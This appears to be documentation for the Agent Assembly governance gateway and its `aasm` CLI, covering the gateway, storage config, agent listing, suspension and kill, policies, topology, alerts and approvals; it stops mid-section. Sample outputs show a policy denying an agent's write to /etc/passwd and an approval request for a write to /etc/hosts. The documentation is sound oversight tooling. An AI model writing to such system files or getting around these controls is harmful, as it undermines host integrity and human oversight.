policy_store       = "redis"
audit_sink         = "postgres"
session_store      = "redis"
credential_store   = "postgres"
rate_limit_counter = "redis"
lifecycle_store    = "postgres"

# Per-driver connection settings live under [storage.<driver-name>].
[storage.redis]
url = "redis://localhost:6379"

[storage.postgres]
url = "postgresql://localhost:5432/assembly"

Each storage kind names a driver (memory, redis, or postgres); the runtime resolves the name to a registered backend at boot, so you can switch backends without recompiling.
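To make the driver-name rule concrete, here is a sketch of the kind of check one could run over the `[storage]` table. It operates on an already-parsed dict (on Python 3.11+, `tomllib.loads` produces one). The `check_storage` helper is hypothetical, and the rule that non-memory drivers need a `url` is an assumption of the example, not documented behaviour of `aasm config validate`.

```python
KNOWN_DRIVERS = {"memory", "redis", "postgres"}


def check_storage(config: dict) -> list:
    """Return a list of problems found in the [storage] table."""
    storage = config.get("storage", {})
    problems = []
    for kind, driver in storage.items():
        if isinstance(driver, dict):
            continue   # a [storage.<driver-name>] settings table, not a storage kind
        if not isinstance(driver, str) or driver not in KNOWN_DRIVERS:
            problems.append(f"{kind}: unknown driver {driver!r}")
        elif driver != "memory" and "url" not in storage.get(driver, {}):
            problems.append(f"{kind}: driver {driver!r} has no url configured")
    return problems
```

An empty list means the table passed these two checks; it says nothing about whether the backends are actually reachable.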

Validate it before you boot

Use aasm config validate to check an agent-assembly.toml (currently the [storage] section) before starting the gateway:

$ aasm config validate agent-assembly.toml.example
Config is valid: agent-assembly.toml.example

A valid file exits 0; an invalid one reports the problem and exits non-zero.

You are configured. Walk through starting a gateway and observing an agent in First run.

Last updated: 2026-06-11 by Chisanan232

First run

This walkthrough takes you from a freshly installed aasm to a running governance gateway that is ready for an agent to connect. Every command and its output below was captured from a real v0.0.1-alpha.5 build.

The flow

flowchart LR
    A["aasm gateway start<br/>--policy low-risk.yaml"] --> B["gRPC gateway<br/>127.0.0.1:50051"]
    B --> C["aasm gateway status<br/>→ running"]
    C --> D{"Connect an<br/>interception layer"}
    D -->|SDK shim| E["Agent registers<br/>via gRPC"]
    D -->|Sidecar proxy| E
    D -->|eBPF on Linux| E
    E --> F["aasm status / topology<br/>view the fleet"]
    F --> G["aasm gateway stop"]

Two endpoints, one gateway. The gateway speaks gRPC on 127.0.0.1:50051 — this is what SDK shims and the sidecar proxy connect to. The operator commands aasm status, aasm agent, and aasm topology talk to the gateway’s HTTP API on http://localhost:8080. In the OSS alpha the gRPC listener is what aasm gateway start brings up; until an HTTP API server is also serving on 8080, the HTTP-backed commands report unreachable. That is expected and called out at each step below.
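When it is unclear which of the two endpoints is up, a plain TCP probe separates "nothing is listening" from "listening but misbehaving". The `is_listening` helper below is a hypothetical sketch; a successful connect shows only that some process accepts connections on that port, not that it is the gateway.

```python
import socket


def is_listening(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

For the setup described here, `is_listening("127.0.0.1", 50051)` probes the gRPC listener and `is_listening("localhost", 8080)` probes the HTTP API.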

1. Start the gateway

Point the gateway at one of the bundled reference policies. policy-examples/ ships low-risk.yaml, medium-risk.yaml, and high-risk.yaml; low-risk allows and audits everything, which is the easiest starting point.

$ aasm gateway start --policy policy-examples/low-risk.yaml
Gateway started on grpc://127.0.0.1:50051  (pid 74472)
Logs: /Users/you/.aasm/logs/gateway.log

This spawns aa-gateway as a detached background process listening for gRPC on 127.0.0.1:50051. (If you built from source, ensure aa-gateway is reachable — aasm gateway start looks in $PATH, ~/.cargo/bin, and ./target/{debug,release}.)
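The lookup described above can be approximated as follows. This is a sketch under assumptions: the function name `find_gateway_binary` is hypothetical, and the search order (`$PATH` first, then `~/.cargo/bin`, then `./target/debug` and `./target/release`) is a guess, since the text lists the locations but not their priority.

```python
import os
import shutil
from pathlib import Path
from typing import Optional


def find_gateway_binary(name: str = "aa-gateway",
                        cwd: Optional[Path] = None,
                        home: Optional[Path] = None) -> Optional[Path]:
    """Look for the binary on $PATH, then in the fallback directories."""
    on_path = shutil.which(name)
    if on_path:
        return Path(on_path)

    cwd = cwd or Path.cwd()
    home = home or Path.home()
    # Assumed order; the documentation does not state a priority.
    candidates = [
        home / ".cargo" / "bin" / name,
        cwd / "target" / "debug" / name,
        cwd / "target" / "release" / name,
    ]
    for candidate in candidates:
        if candidate.is_file() and os.access(candidate, os.X_OK):
            return candidate
    return None
```

If this returns `None` for your checkout, building the crate or adding its directory to `$PATH` is the likely fix.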

Alternative — from a source checkout without installing: the gateway can be run directly with Cargo, which is the form the rest of the book uses:
cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml
It listens on the same 127.0.0.1:50051.

2. Confirm it is running

$ aasm gateway status
Gateway: running  pid=74472  listen=127.0.0.1:50051  uptime=5s

If nothing is running, the command exits non-zero and prints:

$ aasm gateway status
Gateway: not running

Tail the gateway log at any time with aasm gateway logs.
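When scripting around this step, the one-line status output can be split into fields. The parser below is an illustrative sketch based only on the two sample lines shown above; `parse_gateway_status` is a hypothetical helper, and the text layout is not documented as a stable contract. For anything long-lived, the `--json` form of `aasm gateway status` mentioned in the CLI Reference is probably the safer input.

```python
def parse_gateway_status(line: str) -> dict:
    """Split 'Gateway: running  pid=1  listen=...  uptime=5s' into a dict."""
    prefix = "Gateway:"
    if not line.startswith(prefix):
        raise ValueError(f"unexpected status line: {line!r}")

    state_words = []
    fields = {}
    for token in line[len(prefix):].split():
        if "=" in token:
            # key=value tokens such as pid=74472
            key, _, value = token.partition("=")
            fields[key] = value
        else:
            # bare words form the state, e.g. "running" or "not running"
            state_words.append(token)
    return {"state": " ".join(state_words), **fields}
```

All values are kept as strings; converting `pid` to an integer or `uptime` to seconds is left to the caller.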

3. Check overall status

aasm status gives the fleet-wide picture — gateway health, registered agents, pending approvals, and budget. It queries the HTTP API at http://localhost:8080:

$ aasm status
Agent Assembly Status
─────────────────────────────────────
  Gateway:   http://localhost:8080
  Health:    ✗ unreachable
─────────────────────────────────────

RUNTIME HEALTH
──────────────
  API:         ✗ unreachable
  Uptime:      0s
  Connections: 0
  Lag:         0 ms

ACTIVE AGENTS
─────────────
  (no agents registered)

PENDING APPROVALS
─────────────────
  Count:  0

BUDGET STATUS
─────────────
  Daily spend : $-- (no limit set)
  Date:           --
  (no per-agent data)

Error: gateway is not running. Start it with: aasm start

The unreachable health here reflects the gRPC-vs-HTTP split described above: the gRPC gateway from step 1 is up, but the HTTP API on 8080 is not being served in this OSS-only setup. Once an API server is serving on 8080 (for example through the hosted control plane, or a future OSS API server), Health flips to reachable and registered agents appear in ACTIVE AGENTS.

Add --watch to auto-refresh the display every 5 seconds, or --json for a machine-readable header suitable for scripting and CI.

4. Observe an agent

Agents register with the gateway through an interception layer — they are not created from the CLI. Wire one of the SDKs into your agent, or front it with the sidecar proxy, and point it at the gateway:

SDK shim (in-process): install python-sdk, node-sdk, or go-sdk and follow that SDK’s quickstart. The shim reports every action to the gateway over gRPC.
Sidecar proxy (no code changes): run aasm proxy start to intercept the agent’s outbound HTTPS and forward governance decisions to the gateway.
eBPF (Linux only): kernel hooks catch everything else, including bypass attempts.

A quick way to exercise the sidecar path end-to-end is the bundled Docker Compose stack, which runs aa-runtime as a sidecar against a stub agent:

cd examples/docker-compose
AA_API_KEY=dev-local-key docker compose up

The sidecar exposes the agent IPC socket at /tmp/aa-runtime-my-agent-001.sock and a readiness probe at http://localhost:8080/ready.

Once an agent is registered and the HTTP API is reachable, list the fleet:

aasm agent list          # all registered agents
aasm agent inspect <id>  # detail for one agent

Until then these commands report the API as unreachable:

$ aasm agent list
error: API request failed: error sending request for url (http://localhost:8080/api/v1/agents)

5. View the topology

aasm topology visualizes the agent fleet — trees, lineage, teams, and aggregate stats. Like aasm status, it reads the HTTP API:

aasm topology overview   # fleet-wide overview
aasm topology tree <id>  # subtree rooted at an agent
aasm topology stats      # aggregate statistics

With no reachable API it reports:

$ aasm topology overview
error: registry unreachable — check --api-url

6. Open a dashboard

For a live, interactive view there are two consoles:

Web dashboard — aasm dashboard start serves the embedded SPA at http://127.0.0.1:3000 (port configurable; see Configuration). It blocks until Ctrl-C; use aasm dashboard open to launch your browser against an already-running server.
Terminal (TUI) dashboard — aasm dashboard opens an interactive in-terminal dashboard for real-time monitoring, no browser required.

The web dashboard’s app shell looks like this after you sign in — the full governance navigation (Monitor / Control / Manage) down the left, with the approvals indicator, theme toggle, Settings, and Log out across the top:

Figure: web dashboard app shell, showing the governance navigation after login.

The data panels are empty here because this is the open-source local-mode gateway, which serves the SPA but not the populated data API (that lives in the hosted control plane). See Observe in the dashboard for the full picture, including the live-operations and dark-mode views.

7. Stop the gateway

When you are done, shut the gateway down cleanly (SIGTERM, escalating to SIGKILL after the timeout):

aasm gateway stop

Where to go next

CLI Reference — every aasm command and flag.
Usage Guide — govern an agent end-to-end, author policies, and set budgets.
Security Model — the threat model and the three-layer defense-in-depth rationale.

Last updated: 2026-06-12 by Chisanan232

CLI Reference — Overview

The aasm binary (crate aa-cli) is the operator front-end for Agent Assembly. It talks to a running aa-gateway over its HTTP / OpenAPI surface (default http://localhost:8080) for registry, policy, audit, approval, cost, and topology operations, and manages local daemon processes (gateway, proxy, dashboard) directly.

Invocation

aasm [OPTIONS] <COMMAND> [SUBCOMMAND] [ARGS]

Every command supports --help (-h for a one-line summary) at each layer:

aasm --help               # list all top-level commands
aasm policy --help        # list policy subcommands
aasm policy apply --help  # flags + arguments for one subcommand

Global options

These flags are defined on the root parser (aa-cli/src/lib.rs) and are global — they may be passed before the command or on any subcommand.

Flag	Type	Default	Description
`--context <CONTEXT>`	string	(default context, if any)	Named context from `~/.aa/config.yaml` to use for the API URL and key.
`--output <OUTPUT>`	`table` \| `json` \| `yaml`	`table`	Output format for list/get commands.
`--api-url <API_URL>`	string	`http://localhost:8080`	Override the gateway API base URL. Takes precedence over the resolved context.
`--api-key <API_KEY>`	string	(none)	Override the API key. Takes precedence over the context’s stored key.
`-h, --help`	flag	—	Print help.
`-V, --version`	flag	—	Print the `aasm` version.

Several commands also expose a local --output or --json flag that overrides the global --output for that command only (e.g. aasm logs --output json, aasm status --json, aasm gateway status --json). These are called out on the relevant command pages.

Output formats

--output (source: aa-cli/src/output.rs) selects how list/get commands render:

table (default) — human-readable, colorized tables via comfy-table.
json — machine-readable pretty JSON.
yaml — machine-readable YAML.

Commands that stream (aasm logs --follow, aasm approvals watch), visualize (aasm trace, aasm topology tree), or open a TUI (aasm dashboard) ignore --output where it does not apply.

Config and context resolution

CLI configuration lives at ~/.aa/config.yaml (source: aa-cli/src/config.rs). It holds named contexts (connection profiles), an optional default context, and dashboard settings:

default_context: production
contexts:
  production:
    api_url: https://api.example.com
    api_key: prod-key
  staging:
    api_url: https://staging.example.com
dashboard:
  port: 3000
  auto_open: false

The active API URL and key are resolved with this precedence (highest first):

Explicit --api-url / --api-key flags.
The named context — --context <name>, otherwise default_context.
Built-in default URL http://localhost:8080 (no key).

Manage contexts with the aasm context command group.
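The precedence rules above can be expressed in a few lines. The sketch below takes the config as an already-parsed dictionary with the same shape as the YAML example; `resolve_connection` is a hypothetical name, and raising `KeyError` for an unknown context is an assumption about how the failure is surfaced, not a description of the aa-cli code.

```python
from typing import Optional, Tuple

DEFAULT_API_URL = "http://localhost:8080"


def resolve_connection(config: dict,
                       context: Optional[str] = None,
                       api_url: Optional[str] = None,
                       api_key: Optional[str] = None) -> Tuple[str, Optional[str]]:
    """Return (api_url, api_key) using flags > context > built-in default."""
    # --context wins over default_context when both are present.
    name = context or config.get("default_context")
    ctx = {}
    if name is not None:
        contexts = config.get("contexts") or {}
        if name not in contexts:
            raise KeyError(f"context not found: {name}")
        ctx = contexts[name]

    # Explicit flags override whatever the context provides.
    url = api_url or ctx.get("api_url") or DEFAULT_API_URL
    key = api_key or ctx.get("api_key")
    return url, key
```

With the example config, calling `resolve_connection(cfg, context="staging")` yields the staging URL and no key, because that context stores none.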

Note on paths. The CLI config file is ~/.aa/config.yaml. Separately, the locally-managed gateway uses ~/.aasm/ for its runtime artifacts — ~/.aasm/config.yaml (gateway config, see aasm start), ~/.aasm/policy.yaml, ~/.aasm/logs/gateway.log, and ~/.aasm/gateway.pid. These are distinct files.

Exit codes

aasm follows the standard convention:

0 — success.
non-zero — failure. Common causes: the gateway is unreachable, the API returned a non-2xx status, a named context was not found, a file failed to parse, or a validation/simulation step found problems.

Some commands give the exit code a documented meaning so it can gate CI:

Command	Non-zero exit means
`aasm status`	Gateway unreachable, any agent has violations, or storage health probe reports `unavailable`.
`aasm policy simulate`	The simulation detected policy violations.
`aasm policy validate`, `aasm config validate`	The file is invalid (error printed to stderr).
`aasm audit verify-chain`	The audit hash chain failed verification.
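Because these exit codes are documented, a CI job can chain the commands and stop at the first failure. The following is a minimal sketch, not an official wrapper: `run_gates` is a hypothetical helper that just runs whatever argument lists it is given and propagates the first non-zero exit code.

```python
import subprocess
import sys
from typing import Sequence


def run_gates(commands: Sequence[Sequence[str]]) -> int:
    """Run each command in order; return the first non-zero exit code, or 0."""
    for argv in commands:
        result = subprocess.run(list(argv))
        if result.returncode != 0:
            print(f"gate failed ({result.returncode}): {' '.join(argv)}",
                  file=sys.stderr)
            return result.returncode
    return 0
```

A pipeline might call it with `[["aasm", "policy", "validate", "./policies/prod.yaml"], ["aasm", "audit", "verify-chain", "./audit/session-7f3a.jsonl"]]` and pass the result to `sys.exit`.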

Command groups

Command	Talks to	Purpose
`aasm status`	Gateway HTTP	Fleet health, agents, approvals, budget at a glance.
`aasm agent`	Gateway HTTP	List, inspect, suspend, resume, kill registered agents.
`aasm policy`	Gateway HTTP + local	Apply, version, diff, simulate, validate, show policies.
`aasm topology`	Gateway HTTP	Visualize agent trees, teams, lineage, stats.
`aasm alerts`	Gateway HTTP	List, inspect, resolve governance alerts.
`aasm approvals`	Gateway HTTP + WS	Human-in-the-loop approval queue.
`aasm audit`	Gateway HTTP + local	Query, export, verify, and compliance-export audit data.
`aasm logs`	Gateway HTTP + WS	Query and stream audit-log events.
`aasm trace`	Gateway HTTP	Visualize a single session trace.
`aasm cost`	Gateway HTTP	Cost summary and monthly forecast.
`aasm dashboard`	Gateway HTTP/WS + local	TUI dashboard and embedded SPA server.
`aasm gateway`	Local process	Manage the `aa-gateway` daemon.
`aasm proxy`	Local process	Manage the `aa-proxy` sidecar and its CA.
`aasm start` / `aasm stop`	Local process	Start/stop the locally-managed gateway.
`aasm sandbox`	Local	Run a WASM tool under the sandbox.
`aasm config`	Local	Validate / boot an `agent-assembly.toml`.
`aasm context`	Local	Manage `~/.aa/config.yaml` contexts.
`aasm admin`	Gateway HTTP	Administrative operations (retention).
`aasm version`	Gateway HTTP	CLI + gateway/api versions.
`aasm completion`	Local	Generate shell completion scripts.

Developer-only commands. The source tree also defines aasm run (launch a governed AI dev tool) and aasm tools (discover installed AI dev tools). Both are gated behind the devtool region in aa-cli/src/commands/mod.rs and aa-cli/Cargo.toml and are stripped from the published crate by .ci/strip-for-publish.sh before release. They are intentionally not documented here because they are not part of the published aasm surface.

Last updated: 2026-06-11 by Chisanan232

aasm status

Show fleet health, agents, approvals, and budget at a glance. aasm status fetches the deployment overview, runtime health, agent list, pending approvals, cost rollup, and storage health from the gateway in one shot and renders a dashboard-style summary.

Synopsis

aasm status [OPTIONS]

This command has no subcommands.

Options

Flag	Type	Default	Description
`--watch`	flag	off	Auto-refresh the status display every 5 seconds. Runs until interrupted (Ctrl-C).
`--json`	flag	off	Print only the deployment-overview header as machine-readable JSON (the AAASM-1579 contract). Distinct from `--output json`, which serializes the full snapshot.

Plus the global options.

Exit code

0 — all healthy.
non-zero — the gateway is unreachable, at least one agent has violations, or the storage health probe reports unavailable. All failure modes collapse to a single non-zero code so shell scripts can gate on it.

Examples

Show the full status summary:

aasm status

Agent Assembly Status
─────────────────────────────────────
  Mode:      local
  Gateway:   http://localhost:7391
  Storage:   sqlite  (~/.aasm/local.db)
  Version:   0.0.1
  Uptime:    2h 15m 33s
  Health:    ✓ ok
─────────────────────────────────────

Active Agents
  ID        NAME            FRAMEWORK   STATUS   SESSIONS   VIOLATIONS   LAST EVENT
  a1b2…     research-bot    langgraph   active   3          0            2m ago tool_call

Pending Approvals: 1  (oldest 2m 15s)
Budget: $12.50 / $50.00 daily  █████░░░░░░░░░░░░░░░  25%

Continuously refresh:

aasm status --watch

Machine-readable deployment header for CI:

aasm status --json

{
  "mode": "local",
  "gateway_url": "http://localhost:7391",
  "storage_backend": "sqlite",
  "storage_path": "~/.aasm/local.db",
  "version": "0.0.1",
  "uptime_secs": 8133,
  "health": "ok"
}
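A CI step can consume that header with nothing more than a JSON parser. The sketch below assumes the field names shown in the sample above and nothing else; `summarize_header` and `format_uptime` are hypothetical helpers.

```python
import json


def format_uptime(seconds: int) -> str:
    """Render a second count as 'Hh Mm Ss'."""
    hours, remainder = divmod(seconds, 3600)
    minutes, secs = divmod(remainder, 60)
    return f"{hours}h {minutes}m {secs}s"


def summarize_header(raw: str) -> str:
    """Build a one-line summary from the `aasm status --json` header."""
    header = json.loads(raw)
    return (
        f"{header['mode']} gateway at {header['gateway_url']}: "
        f"health={header['health']}, up {format_uptime(header['uptime_secs'])}"
    )
```

Applied to the sample, `format_uptime(8133)` gives `2h 15m 33s`, matching the Uptime line of the human-readable summary.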

Full snapshot as JSON (every section):

aasm status --output json

Last updated: 2026-06-11 by Chisanan232

aasm agent

Manage monitored agent processes registered with the gateway.

Synopsis

aasm agent <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List all registered agents.
`inspect`	Show detailed information about one agent.
`suspend`	Suspend a running agent.
`resume`	Resume a suspended agent.
`kill`	Deregister and terminate an agent.

All subcommands accept the global options, including --output table|json|yaml.

aasm agent list

List all registered agents, with optional client-side filters.

Options

Flag	Type	Default	Description
`--status <STATUS>`	string	—	Filter by agent status (e.g. `Active`, `Suspended`, `Deregistered`).
`--framework <FRAMEWORK>`	string	—	Filter by agent framework (e.g. `langgraph`, `crewai`).
`--watch`	flag	off	Auto-refresh the table every 2 seconds.

Example

aasm agent list --status Active --framework langgraph

ID        NAME           FRAMEWORK   VERSION   STATUS    TOOLS
a1b2c3…   research-bot   langgraph   1.2.0     Active    search, fetch

aasm agent inspect

Render a detailed key-value view of a single agent: identity, status, tools, metadata, active sessions, recent events, and recent trace session IDs.

Arguments

Argument	Type	Description
`<AGENT_ID>`	string	Hex-encoded agent UUID to inspect.

Example

aasm agent inspect a1b2c3d4e5f600112233445566778899

Agent a1b2c3d4…
  Name:        research-bot
  Framework:   langgraph 1.2.0
  Status:      Active
  PID:         48213
  Sessions:    3
  Violations:  0
  Tools:       search, fetch, summarize
  Recent traces:
    7f3a…  2026-06-09T14:02:11Z   (aasm trace 7f3a…)
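Agent IDs are passed as hex-encoded UUIDs, so a script can reject malformed IDs before calling the CLI. This is a sketch under the assumption that a valid ID is exactly 32 hex characters with no hyphens, as in the example above; `parse_agent_id` is a hypothetical helper, and whether aasm also accepts the hyphenated form is not stated here.

```python
import re
import uuid

_HEX32 = re.compile(r"[0-9a-fA-F]{32}")


def parse_agent_id(text: str) -> uuid.UUID:
    """Validate a 32-character hex agent ID and return it as a UUID."""
    if not _HEX32.fullmatch(text):
        raise ValueError("agent ID must be exactly 32 hex characters")
    return uuid.UUID(hex=text)
```

Abbreviated IDs such as the ones shown in table output are rejected, which is the point: only the full ID is unambiguous.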

aasm agent suspend

Suspend a running agent. The reason is logged for audit.

Arguments / options

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Hex-encoded agent UUID to suspend.
`--reason <REASON>`	string	required	Reason for suspending (logged for audit).
`--force`	flag	off	Skip the confirmation prompt.

Example

aasm agent suspend a1b2c3… --reason "investigating cost spike" --force

Suspended a1b2c3… : Active → Suspended

aasm agent resume

Resume a previously suspended agent.

Arguments

Argument	Type	Description
`<AGENT_ID>`	string	Hex-encoded agent UUID to resume.

Example

aasm agent resume a1b2c3…

Resumed a1b2c3… : Suspended → Active

aasm agent kill

Deregister and terminate an agent.

Arguments / options

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Hex-encoded agent UUID to kill.
`--force`	flag	off	Skip the confirmation prompt.

Example

aasm agent kill a1b2c3… --force

Killed a1b2c3… — deregistered and terminated.

Last updated: 2026-06-11 by Chisanan232

aasm policy

Manage governance policies — apply new versions, inspect history, roll back, diff, simulate, validate locally, and view effective policy.

Synopsis

aasm policy <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`apply`	Apply a policy YAML file and save it to version history.
`history`	List recent policy versions.
`rollback`	Roll back to a previous version.
`diff`	Show the diff between two versions.
`simulate`	Dry-run a policy against historical events or live traffic.
`validate`	Validate a policy YAML file locally (no apply).
`get`	Show the active policy YAML (or a specific version).
`list`	List all deployed policies.
`show`	Show an agent’s effective policy view.

All subcommands accept the global options.

aasm policy apply

Apply a policy YAML file and save it to version history.

Name	Type	Default	Description
`<FILE>`	path (arg)	—	Path to the policy YAML file.
`--applied-by <APPLIED_BY>`	string	—	Identity of the person or system applying the policy.

aasm policy apply ./policies/prod.yaml --applied-by alice@example.com

Applied policy 9f2c1a (version 2026-06-09T14:00:00Z) — active, 12 rules

aasm policy history

List recent policy versions.

Name	Type	Default	Description
`-n, --limit <LIMIT>`	integer	`10`	Maximum number of versions to show.

aasm policy history -n 5

aasm policy rollback

Roll back to a previous policy version, making it active again.

Name	Type	Description
`<VERSION>`	string (arg)	Version identifier (SHA-256 prefix) to roll back to.

aasm policy rollback 9f2c1a

aasm policy diff

Show a colorized unified diff between two policy versions. Colors are suppressed when stdout is not a TTY.

Name	Type	Description
`<VERSION_A>`	string (arg)	First version identifier (SHA-256 prefix).
`<VERSION_B>`	string (arg)	Second version identifier (SHA-256 prefix).

aasm policy diff 9f2c1a 7ab310

aasm policy simulate

Simulate a policy against historical audit events or live traffic without enforcing it. Exits non-zero if the simulation detects any violation, so it can gate a CI pipeline.

Flag	Type	Default	Description
`--policy <POLICY>`	path	required	Path to the policy YAML file to simulate.
`--against <AGAINST>`	path	—	Audit-log JSONL file to replay against the policy.
`--live`	flag	`false`	Observe live agent traffic instead of replaying a file.
`--duration <DURATION>`	string	—	Duration for live simulation (e.g. `60s`, `5m`).
`--output-file <OUTPUT_FILE>`	path	—	Write the simulation report JSON here. (Named `--output-file` to avoid colliding with the global `--output`.)

aasm policy simulate --policy ./candidate.yaml --against ./audit/session.jsonl

Simulation: 412 events, 3 would-be violations
  deny  file_write  /etc/passwd   (rule: block-system-paths)
exit status: 1

aasm policy validate

Validate a policy YAML file locally (no apply, no gateway contact). Exits 0 when the file is valid; otherwise exits 1 and prints the error details to stderr.

Name	Type	Description
`<FILE>`	path (arg)	Path to the policy YAML file to validate.

aasm policy validate ./policies/prod.yaml

✓ policy valid — 12 rules

aasm policy get

Show the currently active policy YAML, or a specific version.

Flag	Type	Default	Description
`--version <VERSION>`	string	(latest active)	Version identifier (SHA-256 prefix) to retrieve. Omit for the active policy.

aasm policy get --version 9f2c1a

aasm policy list

List all policies deployed to the governance runtime. Takes no flags of its own (uses the global --output).

aasm policy list

NAME      VERSION                  ACTIVE   RULES
9f2c1a    2026-06-09T14:00:00Z     yes      12
7ab310    2026-06-01T09:30:00Z     no       11

aasm policy show

Show an agent’s effective policy view. By default it prints only the agent identity; add a flag to expand the view into the capability cascade or the budget rollup.

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Hex-encoded agent UUID (32 hex characters).
`--show-permissions`	flag	off	Print the effective capability set with cascade provenance (granted-by / denied-by scope).
`--show-budget`	flag	off	Print the budget rollup across agent / team / org / subtree.

aasm policy show a1b2c3… --show-permissions

Capability        Effective   Granted by      Denied by
search            Allow       team:research   —
file_write        Deny        —               org

Last updated: 2026-06-11 by Chisanan232

aasm topology

Visualize agent topology — fleet overview, delegation trees, teams, ancestry lineage, and aggregate statistics.

Synopsis

aasm topology <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`overview`	Fleet-wide topology overview.
`tree`	Render a subtree rooted at a given agent.
`team`	Show all agents in a team.
`lineage`	Show the ancestry chain for a given agent.
`stats`	Show aggregate topology statistics.

All subcommands accept the global options, including --output table|json|yaml (tables render via box-drawing trees for tree/lineage).

aasm topology overview

Show a fleet-wide topology overview across all teams and root agents.

Flag	Type	Default	Description
`--status <STATUS>`	string	—	Filter agents by status (`active`, `suspended`, `deregistered`).
`--show-budget`	flag	off	Include governance level in agent nodes.

aasm topology overview --status active

aasm topology tree

Render a delegation subtree rooted at one agent, using box-drawing characters.

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Root agent ID (hex-encoded UUID).
`--max-depth <DEPTH>`	integer	`10`	Maximum traversal depth from the root.
`--status <STATUS>`	string	—	Filter tree nodes by status.
`--show-budget`	flag	off	Include governance level in tree nodes.

aasm topology tree a1b2c3… --max-depth 3

research-bot (a1b2c3…)
├── fetch-worker (d4e5f6…)
│   └── parse-worker (778899…)
└── summarize-worker (aabbcc…)
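The box-drawing layout above is a standard depth-first rendering. The sketch below reproduces it from a parent-to-children map; `render_tree` is a hypothetical function, the input shape is invented for illustration, and the way `max_depth` is counted (number of levels below the root) is an assumption about what `--max-depth` means.

```python
from typing import Dict, List


def render_tree(root: str,
                children: Dict[str, List[str]],
                max_depth: int = 10) -> str:
    """Render a delegation tree with box-drawing characters (assumes no cycles)."""
    lines = [root]

    def walk(node: str, prefix: str, depth: int) -> None:
        if depth >= max_depth:
            return
        kids = children.get(node, [])
        for index, kid in enumerate(kids):
            last = index == len(kids) - 1
            lines.append(prefix + ("└── " if last else "├── ") + kid)
            # Children of the last sibling need no vertical guide line.
            walk(kid, prefix + ("    " if last else "│   "), depth + 1)

    walk(root, "", 0)
    return "\n".join(lines)
```

Passing `max_depth=1` keeps only the root and its direct children, which is a quick way to check the depth convention against real output.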

aasm topology team

Show all agents belonging to a single team.

Name	Type	Default	Description
`<TEAM_ID>`	string (arg)	—	Team ID.
`--status <STATUS>`	string	—	Filter members by status.
`--show-budget`	flag	off	Include governance level in agent nodes.

aasm topology team research --status active

aasm topology lineage

Show an agent’s complete ancestry chain, ordered root-first.

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Agent ID (hex-encoded UUID).
`--show-permissions`	flag	off	After the lineage, also print the agent’s effective capability set with cascade provenance.

aasm topology lineage 778899… --show-permissions

research-bot (a1b2c3…)
└── fetch-worker (d4e5f6…)
    └── parse-worker (778899…)   ← target
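Conceptually, a lineage is a walk up the parent links, reversed so that the root comes first. A minimal sketch, assuming each agent records at most one parent; the `parent_of` mapping and the `lineage` function are hypothetical and not the gateway's data model.

```python
from typing import Dict, List, Optional


def lineage(agent: str, parent_of: Dict[str, Optional[str]]) -> List[str]:
    """Return the ancestry chain for `agent`, ordered root-first."""
    chain: List[str] = []
    seen = set()
    current: Optional[str] = agent
    while current is not None:
        if current in seen:
            raise ValueError("cycle detected in parent links")
        seen.add(current)
        chain.append(current)
        current = parent_of.get(current)
    chain.reverse()  # collected target-first, reported root-first
    return chain
```

The last element of the result is always the target agent, which corresponds to the `← target` marker in the output above.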

aasm topology stats

Show aggregate topology statistics — total/root/active/suspended counts, max depth, team sizes, and depth/spawn histograms. Takes no flags of its own (uses the global --output).

aasm topology stats

Total agents:    42
Root agents:     5
Max depth:       4
Active:          38   Suspended: 3   Deregistered: 1
Teams:           5
Avg children/parent: 2.31

Last updated: 2026-06-11 by Chisanan232

aasm alerts

Manage governance alerts — list, inspect, and resolve.

Synopsis

aasm alerts <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List governance alerts.
`get`	Show full detail for one alert.
`resolve`	Resolve an alert.

All subcommands accept the global options.

aasm alerts list

List governance alerts as a color-coded table, with optional filters.

Flag	Type	Default	Description
`--agent <AGENT>`	string	—	Filter by agent ID.
`--severity <SEVERITY>`	string	—	Filter by severity (`critical`, `warning`, `info`).
`--status <STATUS>`	string	`unresolved`	Filter by status (`unresolved`, `acknowledged`, `resolved`).

aasm alerts list --severity critical

ID       SEVERITY   CATEGORY          STATUS       MESSAGE
al-301   critical   budget            unresolved   team:research over daily cap
al-298   warning    policy_violation  unresolved   file_write denied (agent a1b2c3…)

aasm alerts get

Render a detailed key-value view of one alert.

Argument	Type	Description
`<ALERT_ID>`	string	Alert ID to inspect.

aasm alerts get al-301

aasm alerts resolve

Resolve an alert, optionally attaching a note.

Name	Type	Default	Description
`<ALERT_ID>`	string (arg)	—	Alert ID to resolve.
`--reason <REASON>`	string	—	Optional resolution note.
`--force`	flag	off	Skip the confirmation prompt.

aasm alerts resolve al-301 --reason "raised team cap" --force

Resolved al-301.

Last updated: 2026-06-11 by Chisanan232

aasm approvals

Manage human-in-the-loop approval requests — list pending actions, approve or reject them, and watch for new requests in real time.

Synopsis

aasm approvals <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List pending (or resolved) approval requests.
`get`	Show details of one request.
`approve`	Approve a pending action.
`reject`	Reject a pending action.
`watch`	Watch for new approval requests over WebSocket.

All subcommands accept the global options.

aasm approvals list

List approval requests as a colored table. The TIMEOUT_IN column is color-coded (red < 60s, yellow 60–180s, green > 180s).

Flag	Type	Default	Description
`--output <FORMAT>`	`table` \| `json` \| `yaml`	global default	Per-command output override.
`--status <STATUS>`	`pending` \| `approved` \| `rejected`	`pending`	Filter by lifecycle status. Resolved history is bounded (default cap 1000).
`--agent <AGENT>`	string	—	Filter to approvals submitted by this agent ID (exact match).

aasm approvals list --status pending

ID        AGENT      ACTION        CONDITION       SUBMITTED_AT          TIMEOUT_IN
ap-77     a1b2c3…    file_write    /etc/hosts      2026-06-09T14:01:00Z  2m 30s
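The TIMEOUT_IN thresholds translate directly into a small classifier. This sketch assumes the remaining time is available in whole seconds and that the yellow band includes both 60s and 180s, which is how the ranges above read; `timeout_color` is a hypothetical name.

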